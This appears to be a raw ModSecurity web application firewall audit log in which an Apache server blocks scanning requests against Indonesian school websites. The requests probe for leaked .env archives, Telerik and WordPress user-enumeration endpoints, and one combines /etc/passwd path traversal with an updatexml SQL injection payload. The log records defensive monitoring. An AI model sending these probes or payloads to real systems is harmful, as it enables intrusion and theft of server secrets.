1746605167772287 710 (- - -) Stopwatch2: 1746605167772287 710; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d9c0501-Z-- --2e65240d-A-- [07/May/2025:15:06:07 +0700] aBsUb12wLCWKKTe5QCHHFwAAAFE 103.236.140.4 34952 103.236.140.4 8181 --2e65240d-B-- GET /.env.zip HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855488 --2e65240d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e65240d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167857439 709 (- - -) Stopwatch2: 1746605167857439 709; combined=276, p1=240, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e65240d-Z-- --862edd3f-A-- [07/May/2025:15:06:07 +0700] aBsUb0kjCPYF0_E6F_IttAAAAJE 103.236.140.4 34956 103.236.140.4 8181 --862edd3f-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932992 --862edd3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --862edd3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167893635 678 (- - -) Stopwatch2: 1746605167893635 678; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --862edd3f-Z-- --86b9b815-A-- [07/May/2025:15:06:07 +0700] aBsUb12wLCWKKTe5QCHHGAAAAEw 103.236.140.4 34960 103.236.140.4 8181 --86b9b815-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855491 --86b9b815-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --86b9b815-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605167928069 683 (- - -) Stopwatch2: 1746605167928069 683; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86b9b815-Z-- --48936605-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHGQAAAEY 103.236.140.4 34964 103.236.140.4 8181 --48936605-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932995 --48936605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48936605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168000941 656 (- - -) Stopwatch2: 1746605168000941 656; combined=251, p1=218, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48936605-Z-- --98e4c179-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHGgAAAE8 103.236.140.4 34968 103.236.140.4 8181 --98e4c179-B-- GET /.env.rar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855494 --98e4c179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --98e4c179-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168075341 708 (- - -) Stopwatch2: 1746605168075341 708; combined=262, p1=229, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98e4c179-Z-- --80e39311-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHAAAAFY 103.236.140.4 34974 103.236.140.4 8181 --80e39311-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140932998 --80e39311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --80e39311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168110812 719 (- - -) Stopwatch2: 1746605168110812 719; combined=288, p1=238, p2=0, p3=0, p4=0, p5=50, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e39311-Z-- --15791d10-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHQAAAE4 103.236.140.4 34978 103.236.140.4 8181 --15791d10-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855497 --15791d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --15791d10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168145554 723 (- - -) Stopwatch2: 1746605168145554 723; combined=263, p1=226, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15791d10-Z-- --1748e028-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSfsgAAAMc 103.236.140.4 34982 103.236.140.4 8181 --1748e028-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933001 --1748e028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1748e028-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168217855 726 (- - -) Stopwatch2: 1746605168217855 726; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1748e028-Z-- --6ec9c902-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSfswAAAM4 103.236.140.4 34986 103.236.140.4 8181 --6ec9c902-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855500 --6ec9c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6ec9c902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168291668 711 (- - -) Stopwatch2: 1746605168291668 711; combined=272, p1=238, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec9c902-Z-- --2424487e-A-- [07/May/2025:15:06:08 +0700] aBsUcIyiPdJj1JUH57qD5AAAAAs 103.236.140.4 34990 103.236.140.4 8181 --2424487e-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933004 --2424487e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2424487e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168327037 785 (- - -) Stopwatch2: 1746605168327037 785; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2424487e-Z-- --fe87cd04-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSftAAAAMA 103.236.140.4 34994 103.236.140.4 8181 --fe87cd04-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855503 --fe87cd04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fe87cd04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168361567 691 (- - -) Stopwatch2: 1746605168361567 691; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe87cd04-Z-- --06089d09-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSftQAAAMs 103.236.140.4 34998 103.236.140.4 8181 --06089d09-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933007 --06089d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06089d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168437428 659 (- - -) Stopwatch2: 1746605168437428 659; combined=256, p1=222, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06089d09-Z-- --92127a31-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHgAAAEE 103.236.140.4 35004 103.236.140.4 8181 --92127a31-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855506 --92127a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --92127a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168512256 700 (- - -) Stopwatch2: 1746605168512256 700; combined=262, p1=229, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92127a31-Z-- --27cd826e-A-- [07/May/2025:15:35:52 +0700] aBsbaG3ZWOH0zu5xiSSh5gAAANI 103.236.140.4 45824 103.236.140.4 8181 --27cd826e-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --27cd826e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27cd826e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.smkn22-jkt.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746606952006859 2308 (- - -) Stopwatch2: 1746606952006859 2308; combined=1030, p1=379, p2=619, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27cd826e-Z-- --3b2f3274-A-- [07/May/2025:15:48:22 +0700] aBseVkkjCPYF0_E6F_IuXQAAAIo 103.236.140.4 46168 103.236.140.4 8181 --3b2f3274-B-- GET /?2wl640bIwNkCwqxcT3xEFR5iKyt=../../../../../../../../etc/passwd&2wl640bIwNkCwqxcT3xEFR5iKyt=1%20and%20updatexml(1,concat(0x7e,(select%20md5(72300))),1) HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --3b2f3274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b2f3274-E-- --3b2f3274-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?2wl640bIwNkCwqxcT3xEFR5iKyt=../../../../../../../../etc/passwd&2wl640bIwNkCwqxcT3xEFR5iKyt=1%20and%20updatexml(1,concat(0x7e,(select%20md5(72300))),1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746607702040285 1972 (- - -) Stopwatch2: 1746607702040285 1972; combined=603, p1=385, p2=184, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b2f3274-Z-- --f1da561f-A-- [07/May/2025:15:53:53 +0700] aBsfoUkjCPYF0_E6F_IvGQAAAJQ 103.236.140.4 48718 103.236.140.4 8181 --f1da561f-B-- GET /ldlogon.dll HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --f1da561f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1da561f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.smkn22-jkt.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746608033040641 1867 (- - -) Stopwatch2: 1746608033040641 1867; combined=820, p1=379, p2=411, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1da561f-Z-- --02ec0a01-A-- [07/May/2025:16:19:11 +0700] aBslj12wLCWKKTe5QCHPfgAAAEU 103.236.140.4 34266 103.236.140.4 8181 --02ec0a01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.10.93.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.10.93.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02ec0a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02ec0a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746609551960992 2770 (- - -) Stopwatch2: 1746609551960992 2770; combined=1266, p1=439, p2=797, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02ec0a01-Z-- --e3de0f49-A-- [07/May/2025:16:22:20 +0700] aBsmTG3ZWOH0zu5xiSSl8gAAAMM 103.236.140.4 35936 103.236.140.4 8181 --e3de0f49-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.109.167.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.109.167.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3de0f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3de0f49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 